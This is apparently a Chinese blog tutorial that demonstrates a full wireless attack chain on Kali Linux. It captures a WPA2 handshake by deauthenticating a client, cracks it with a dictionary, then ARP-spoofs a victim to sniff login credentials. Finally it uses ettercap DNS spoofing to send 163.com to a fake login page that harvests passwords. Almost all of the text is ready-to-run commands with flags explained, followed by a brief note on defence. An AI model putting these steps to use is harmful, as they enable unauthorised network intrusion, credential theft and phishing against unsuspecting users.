随着无线网络走进我们的生活，在方便了我们的同时又产生了许多的安全问题。如果你不加任何防范的话，无疑是向黑客敞开了大门。黑客一旦入侵了你的无线网，就可以在你毫无察觉的情况下监听你网络的一举一动，你的账号密码等等一切个人信息将暴露给黑客。

下面，我就来演示一下，无线网是如何被入侵并监听的。

首先我们需要一台装有Kali linux系统的攻击机，还需要一个外置的无线网卡。我这里用的是RT3070L芯片的免驱动网卡，推荐大家也买此类型的。因为我在选购网卡的时候踩过不少的坑，反复换购了好几款网卡才找到了这个可以兼容kali 4.15内核的网卡。

淘宝链接分享

kali linux可以到官网下载，今天就不讲如何安装了，大家可以自行百度哈。

先上一张我kali霸气的桌面截图

2C7DCFFB124D9F65B68CFCD0A9EEBF56.png

现在开始正式破解，插入我们的无线网卡，然后断开有线连接，不要使其连接到任何的网络。

打开终端输入 ifconfig 可以看到我们的无线网卡 wlan0

QQ20180526-230919.png

如果没有看到，可能是我们的网卡并没有启动。我们可以通过输入 ifconfig -a 看到wlan0网卡，然后通过 ifconfig wlan0 up 来启用它。

启用网卡后我们需要通过 airmon-ng start wlan0开启网卡的监听模式

QQ20180526-231200.png

开启后输入 ifconfig 这时我们可以看到我们的网卡名称变成了wlan0mon

这时我们就可以通过 airodump-ng wlan0mon 来扫描附近的wifi热点

QQ20180526-231410.png

这里我用 Xiaomi_0C327 这个热点来做演示，其中 BSSID 代表这台路由器的MAC地址 CH代表信道

再开一个终端，用 airodump-ng -c 1 --bssid 34:CE:00:26:0C:1C -w cap wlan0mon 对这台路由器进行抓包。

-c 代表信道
--bssid 代表路由器的mac地址
-w 指定抓到的包存放在哪个目录叫什么名字

这个时候我们可以看到此台路由器下连接了几台设备，以及连接设备的mac地址。但是由于设备和路由器是保持连接的状态，还没有办法抓到设备发给路由器带有密码信息的包。

QQ20180526-231807.png

所以我们要通过发送给路由器假的认证请求，来把设备踢掉线，当设备自动重新连接的时候，密码就会被抓到。

再开一个终端，输入 aireplay-ng -0 10 -a 34:CE:00:26:0C:1C -c 98:CA:33:0A:F2:82 wlan0mon 踢下线

-0 代表发送认证消息
10 代表发送10条
-a 指定路由器mac地址
-c 指定设备mac地址

2018-05-26-222514_757x522_scrot.png

当看到 [ WPA handshake: ] 字样时，代表我们已经成功的抓到了握手包。在目录中我们就可以看到如下图的几个文件。

QQ20180526-232105.png

2018-05-26-222919_406x216_scrot.png

最后我们通过跑字典的方式来将密码找出来。开个终端输入 aircrack-ng cap-01.cap -w password.txt 爆破

cap-01.cap 是刚刚抓到的包
-w 指定密码字典

QQ20180526-232355.png

等待一小会儿密码就破解出来了。当然我这里使用的是单线程，你也可以拿抓到的包去其他一些跑包软件里去跑，多线程加GPU能力效率要高一些。或者去网上找那些专门做跑包的店铺，几十块钱就可以出结果。

不过，最近暴出WPA2加密协议有漏洞，黑客可以在路由器和设备间的四次握手中重装加密密钥，这种攻击方式称之为KRACK。也就是说可以无视密码直接连入wifi，不用再进行这些无聊的抓包跑包。据说这些漏洞存在于WPA2协议当中，而非单个产品或实现当中。因此，任何使用WPA2协议的无线网络均可能受到影响。

也不知道现在这个漏洞还能不能利用，找时间测试一下。

好，内网渗透的第一步我们已经完成了，接下来我们要对目标机进行ARP欺骗和DNS劫持。

打开终端输入 airmon-ng stop wlan0mon 关闭网卡的监听模式，然后用刚刚得到的密码连入 Xiaomi_0C327 这个网络

连入后通过 ifconfig 查看网卡被分配的ip地址，可以推断出网关地址。

QQ20180527-000135.png

这里我的 wlan0 网卡分配到的地址是 192.168.31.147 所以网关地址应该就是 192.168.31.1

用 nmap 扫描一下网关，我们就可以看到内网中存活了那些主机

命令 nmap -sP 192.168.31.1/24

QQ20180527-000941.png

这里我选用 192.168.31.181 这台机器作为靶机

打开一个终端，开启自己的流量转发，使靶机的流量可以先经过攻击机，然后再到路由器。

命令 echo 1 > /proc/sys/net/ipv4/ip_forward

然后 cat /proc/sys/net/ipv4/ip_forward 如果返回 1 代表转发开启成功

打开一个终端，通过命令 arpspoof -i wlan0 -t 192.168.31.181 -r 192.168.31.1 对靶机进行ARP欺骗

-i 代表网卡
-t 代表靶机的ip
-r 代表网关的ip

2018-05-27-002832_758x507_scrot.png

这时我们的攻击机已经成为了一个中间人，靶机的所有流量都要先经过攻击机，再到路由器。而靶机用户毫无察觉。

我们先来用一款小工具来监听靶机浏览的图片

打开终端输入 driftnet -i wlan0 等待出图

2018-05-27-004114_665x534_scrot.png

娱乐一下的小工具，感觉没啥用。接下来，我们抓靶机用户的登录账户和密码。

终端输入 wireshark 打开wireshark抓包工具，选择我们的 wlan0 网卡

2018-05-27-004757_1545x1001_scrot.png

用靶机访问 http://www.qingtaidu.cn/wp-login.php 这个wp网站的后台并登录，然后用攻击机抓包。加上一些过滤条件，方便寻找。

E0D55CBD-6B06-445B-B5C6-B4FA6DCBC276.png

我们还可以对靶机进行DNS劫持。正常情况下访问 http://www.163.com/ 是这个样子

QQ20180527-011336.png

然后用攻击机对这个网址进行DNS劫持，把他解析到我自己写的163邮箱的登录页面。这样用户输入账号密码都会被存下来。

首先在终端输入命令 vi /etc/ettercap/etter.dns 添加一条解析

www.163.com A 47.94.222.65

然后在嗅探欺骗类工具中打开ettercap，【sniff】>【Unified sniffing】，选择我们的 wlan0 网卡。【Plugins】>【Manage the plugins】双击 dns_spoof模块，最后【Start】>【Start sniffing】

这时靶机再访问 http://www.163.com/ 就会变成这个样子

QQ20180527-013813.png

以上的嗅探和欺骗都是建立在 http 协议上的，https 协议的会失效。网上有教程说用 sslstrip 可以对 https进行降级，试了一下是可以降级，但是浏览器会有证书报错提示，用户很容易就能发现问题。

也不知道大牛们有没有什么更好的方式

好了，说完了攻击，我们来说说防御。上面所说的嗅探都是建立在内网环境下并且进行了ARP欺骗后的，所以要防守就要注意路由器的安全问题，密码尽量设置的复杂一下，大小写加数字字母符号，这样被暴力破解的几率就会减小。路由器和设备进行双向绑定，防止ARP欺骗。

不早了，今天就说这么多吧！等下一篇文章再分享其他的安全知识。